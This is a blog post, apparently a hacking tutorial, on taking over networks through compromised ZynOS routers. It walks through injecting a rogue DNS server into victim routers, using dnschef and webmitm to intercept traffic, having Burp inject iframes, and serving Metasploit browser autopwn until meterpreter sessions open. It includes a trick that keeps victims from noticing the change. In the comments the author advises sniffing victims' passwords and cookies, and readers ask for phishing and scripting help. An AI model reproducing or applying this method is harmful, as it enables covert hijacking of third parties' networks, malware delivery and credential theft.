ZynOS – Part 2 ( Taking over the network )

Hello again 🙂

I’m going to recap from the last post. So what I’m about to demonstrate in this post is the impact that can some attacker cause to your network once he access the router  ..

We have access to the router but our goal is to get a foothold on the remote network, hmm .. we have port forwarding option which is beautiful, what we can do with that is scrap the network pool for internal IPs and forward ports like 445, 139 and try to exploit them from our end. Imagine also a network with 200 machines that will definitely be time consuming .. even if you write a script to automate that what makes you believe that you’re going to actually be able to get meterpreter sessions ?

So .. what’s the solution ?

Hmm, DNS is an interesting thing to look at since we can provide dns IP to the router for the whole network to use !!

Are we talking about DNS intercepting ? Hell yeah 😀

Here is a list of the tools we’re going to use :

Dnschef : A dns proxy ( read about it HERE )
Metasploit : How to install ( ubuntu ) HERE
Webmitm : Find out more about it HERE
Burp Suite : It’s available HERE

-Attacking from ubuntu “Metasploit & dnschef & webmitm” running on (IP:

-Burp suite will be running at (IP:

First, I’ll explain how I’m going to do the attack :

We’re going to setup our Dnschef proxy

Screen Shot 2014-01-18 at 1.30.27 PM

./dnschef.py –interface –fakeip 

–interface : is going to tell dnschef at what interface it’ll listen for .

–fakeip : this hijacks requests by returning this IP as the result for every request

The next step is to lunch webmitm tool that will handle the http requests and responses, from there we’ll tell webmitm tool to forward the traffic to burp suite proxy that will allow us to inject an iframe of Metasploit browser autopwn server.

Screen Shot 2014-01-18 at 1.38.01 PM

We have to configure burp suite so that it handle requests on port 80

Screen Shot 2014-01-18 at 1.40.00 PM

Have to be invisible ..

Screen Shot 2014-01-18 at 1.40.16 PM

Repeat these steps for port 443 to handle HTTPS traffic .

Ok, so everything is ready now .. I’ll have to modify the scripts I provided in the previous post so that we can inject our DNS server .

Screen Shot 2014-01-18 at 1.49.47 PM

This way I injected my ip address as the first DNS server to use on the router and the 2nd one is the one that belongs to google, this way if  we want to stop the attack on the already injected routers by blocking requests made to our DNS server , then the router will automatically proceed to the 2nd server that belongs to google without showing any DNS resolution error on the victim end.

ok, so now we’ll have to lunch the browser autopwn module on metasploit .

PS: I’ll be using port “8080” because webmitm is already using port “80” to forward traffic .

Screen Shot 2014-01-18 at 2.10.54 PM

Screen Shot 2014-01-18 at 2.12.09 PM

it’s loaded and waiting for victims to browse 🙂

Ok, so from here we’ll have to add the iframe injection to burp suite. So that if it get a response on a page requested by the victim it injects iframe with “” that’s listening on Metasploit.

Screen Shot 2014-01-18 at 2.11.33 PM


After injecting my DNS server to the victim router using the scripts, and after setting up everything from dnschef to metasploit . Let’s follow what happens if a victim browse to a website .

Screen Shot 2014-01-18 at 2.18.13 PM

We got 3 meterpreter sessions :D,


Any questions or comments feel free to contact me. And as always : Happy Hacking 🙂


27 thoughts on “ZynOS – Part 2 ( Taking over the network )

  1. hi bro
    vey nice job ….
    i have question …
    what can i do if want to sniff data such as cookie or password from data in router ?


  2. i mean dont use Metasploit …. just sniffing data or fishing some website like facebook…

    sorry for spam

    1. Hi, thanks for you comments . Well, I understand what you are willing to do .. so what i recommend is just proceed with the steps i provided and then lunch your wireshark or any other packer sniffing software and then you should see data, basically all of the victim’s traffic is going through your computer 🙂 .

      I hope this helps ..

      1. tanQ i use dnschef and webmitm -d and than i run dsnif and work well now i want to change script becuse it use sabnet cdr …. and i want to use ip range :

        you use IPNetwork subnet :

        for ip in IPNetwork (‘’):

        and i want to use ip range
        for example :

        netaddr.iprange_to_cidrs (‘ ,’):

        any idea ?

        tanq brother 🙂

  3. 123 vive l’algerie 😉
    sorry coz i’m so bad in english & i wanna learn from u if u want, but in arabic
    is there anyway to contact u ?

  4. Nasro can u make this tutorial in short video please
    i got some error when i use dnschef
    thx 😉

  5. Hi Bro , it’s Great Job nd Thnx For what you do 😉
    i have a problem when i injected my ip to server dns route of victem , it’s not working ? i don’t understood that ! i try with all ways so can you explain to me ?!!

  6. Hi,
    it’s a great code by python that one for zynos attack… but i can’t get results as the str1 is empty!! or the result of the decoded.php is something like “There was an error uploading the file, please try again!”.. like when you access the page like this”
    any help please?

  7. Hi Nassro

    good work

    while running the script im getting the following error

    Traceback (most recent call last):
    File “C:\Users\raydan\Desktop\zynos-attacker-master\zynos-attacker-master\attack.py”, line 1, in
    from netaddr import IPNetwork
    ImportError: No module named netaddr

  8. ok so i got everything set up. but where do i find ip for burpsuite? and when i do browse it comes up with burp saying something. i also tried this and set up a server via Setoolkit. and to set dnschef fakedomain=facebook.com. did not work also tried setting up sslstrip bot no joy. thanks for this anyways.

  9. Hi. This is the only article I have found on this. I have some questions.
    Sorry if they are noob questions.
    I am running kali linux.
    Is this possible without running Burp on a diffrent IP?
    Assuming , I have a remote router’s login, what IP would I put in the router’s Static DNS to point all client requests to my NOIP for se toolkit attacks?

    If that is not possible what IP can I put in there just to monitor traffic?

    Noobest question ..How do I make my NoIP address a DNS server?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s